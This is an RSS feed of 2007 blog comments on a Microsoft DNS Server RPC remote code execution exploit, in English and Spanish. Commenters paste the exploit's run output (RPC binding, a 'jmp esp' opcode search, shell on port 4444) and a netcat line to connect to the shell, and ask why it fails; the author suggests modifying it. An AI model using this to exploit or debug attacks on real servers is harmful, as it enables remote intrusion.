<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comentarios en: Microsoft DNS Server Remote Code execution Exploit</title>
	<atom:link href="http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/</link>
	<description>48Bits ... The one and a half architecture land.</description>
	<lastBuildDate>Thu, 09 Feb 2012 23:02:12 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>Por: PoWeRGuArD</title>
		<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-39649</link>
		<dc:creator>PoWeRGuArD</dc:creator>
		<pubDate>Thu, 10 May 2007 10:28:11 +0000</pubDate>
		<guid isPermaLink="false">http://blog.48bits.com/?p=92#comment-39649</guid>
		<description>hi all friend,

I use to exploit my server 2003. 
Exploit done result is message..

C:\&gt;dnstest -h 127.0.0.1
 --------------------------------------------------------------
 Microsoft Dns Server local &amp; remote RPC Exploit code
 Exploit code by Andres Tarasco &amp; Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:127.0.0.1
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:127.0.0.1[1027]
[+] Dynamic DNS rpc port found (1027)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
27]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] Return code: 0

Okey... afeter other computer in lan run nc (netcat) and =&gt; nc 192.168.1.100 4444 but not connect ,
where i mistake?

Thanks, all</description>
		<content:encoded><![CDATA[<p>hi all friend,</p>
<p>I use to exploit my server 2003.<br />
Exploit done result is message..</p>
<p>C:\&gt;dnstest -h 127.0.0.1<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
 Microsoft Dns Server local &amp; remote RPC Exploit code<br />
 Exploit code by Andres Tarasco &amp; Mario Ballano<br />
 Tested against Windows 2000 server SP4 and Windows 2003 SP2<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>[+] Remote Host identified as Windows 2003<br />
[-] No port selected. Trying Ninja sk1llz<br />
[+] Binding to ncacn_ip_tcp:127.0.0.1<br />
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0<br />
[+] RPC binding string: ncacn_ip_tcp:127.0.0.1[1027]<br />
[+] Dynamic DNS rpc port found (1027)<br />
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10<br />
27]<br />
[+] RpcBindingFromStringBinding success<br />
[+] Sending Exploit code to DnssrvOperation()<br />
[+] Now try to connect to port 4444<br />
[-] Return code: 0</p>
<p>Okey&#8230; afeter other computer in lan run nc (netcat) and =&gt; nc 192.168.1.100 4444 but not connect ,<br />
where i mistake?</p>
<p>Thanks, all</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Mario</title>
		<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-37023</link>
		<dc:creator>Mario</dc:creator>
		<pubDate>Sat, 28 Apr 2007 21:30:09 +0000</pubDate>
		<guid isPermaLink="false">http://blog.48bits.com/?p=92#comment-37023</guid>
		<description>Hi, 

Seems that old versions of DNS Server have different compilation than newers, so perhaps the stack layout is not the same, the exploit was tested only with updated OSes, you can modify yourself the exploit in order to get it working :-)

Cheers, 

Mario</description>
		<content:encoded><![CDATA[<p>Hi, </p>
<p>Seems that old versions of DNS Server have different compilation than newers, so perhaps the stack layout is not the same, the exploit was tested only with updated OSes, you can modify yourself the exploit in order to get it working <img src='http://blog.48bits.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Cheers, </p>
<p>Mario</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: siggame</title>
		<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-36626</link>
		<dc:creator>siggame</dc:creator>
		<pubDate>Thu, 26 Apr 2007 09:08:24 +0000</pubDate>
		<guid isPermaLink="false">http://blog.48bits.com/?p=92#comment-36626</guid>
		<description>C:\Documents and Settings&gt;dnstest2 -h 127.0.0.1
 --------------------------------------------------------------
 Microsoft Dns Server local &amp; remote RPC Exploit code
 Exploit code by Andres Tarasco &amp; Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Remote Host identified as Windows 2000
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:127.0.0.1
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:222.122.46.150[1062]
[+] Dynamic DNS rpc port found (1062)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
62]
[+] RpcBindingFromStringBinding success
[+] Searching local opcodes at Kernel32.dll (0x77e50000)
[+] Searching 0x100000 bytes
[+] Opcode &quot; jmp esp&quot; at address 0x
[+] Please report this offset to us so we can update the exploit =)
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/

why DNS&#039;s close?</description>
		<content:encoded><![CDATA[<p>C:\Documents and Settings&gt;dnstest2 -h 127.0.0.1<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
 Microsoft Dns Server local &amp; remote RPC Exploit code<br />
 Exploit code by Andres Tarasco &amp; Mario Ballano<br />
 Tested against Windows 2000 server SP4 and Windows 2003 SP2<br />
 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>[+] Remote Host identified as Windows 2000<br />
[-] No port selected. Trying Ninja sk1llz<br />
[+] Binding to ncacn_ip_tcp:127.0.0.1<br />
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0<br />
[+] RPC binding string: ncacn_ip_tcp:222.122.46.150[1062]<br />
[+] Dynamic DNS rpc port found (1062)<br />
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10<br />
62]<br />
[+] RpcBindingFromStringBinding success<br />
[+] Searching local opcodes at Kernel32.dll (0x77e50000)<br />
[+] Searching 0&#215;100000 bytes<br />
[+] Opcode &#8221; jmp esp&#8221; at address 0x<br />
[+] Please report this offset to us so we can update the exploit =)<br />
[+] Sending Exploit code to DnssrvOperation()<br />
[+] Now try to connect to port 4444<br />
[-] RPC Server reported exception 0x6be = 1726<br />
[-] Looks like remote RPC server crashed :/</p>
<p>why DNS&#8217;s close?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: svch0st</title>
		<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-35847</link>
		<dc:creator>svch0st</dc:creator>
		<pubDate>Mon, 23 Apr 2007 07:08:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.48bits.com/?p=92#comment-35847</guid>
		<description>Veo que seguís siendo putos amos...
Solo recordaros que Bender es Dios y que siempre hemos de alabarle y respertarle bajo cualquier circunstanciamen.
Un saludo y a ver cuando nos tomamos unas cañotas...</description>
		<content:encoded><![CDATA[<p>Veo que seguís siendo putos amos&#8230;<br />
Solo recordaros que Bender es Dios y que siempre hemos de alabarle y respertarle bajo cualquier circunstanciamen.<br />
Un saludo y a ver cuando nos tomamos unas cañotas&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: ANELKAOS</title>
		<link>http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-35009</link>
		<dc:creator>ANELKAOS</dc:creator>
		<pubDate>Wed, 18 Apr 2007 01:35:16 +0000</pubDate>
		<guid isPermaLink="false">http://blog.48bits.com/?p=92#comment-35009</guid>
		<description>Muy bueno Mario :) os lo he puesto aquí:

http://foro.elhacker.net/index.php/topic,161994.0.html

Lo estuve probando esta tarde pero sobre 2k3+SP2 con lo que....

[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/

Un saludo.</description>
		<content:encoded><![CDATA[<p>Muy bueno Mario <img src='http://blog.48bits.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  os lo he puesto aquí:</p>
<p><a href="http://foro.elhacker.net/index.php/topic,161994.0.html" rel="nofollow">http://foro.elhacker.net/index.php/topic,161994.0.html</a></p>
<p>Lo estuve probando esta tarde pero sobre 2k3+SP2 con lo que&#8230;.</p>
<p>[+] Now try to connect to port 4444<br />
[-] RPC Server reported exception 0x6be = 1726<br />
[-] Looks like remote RPC server crashed :/</p>
<p>Un saludo.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

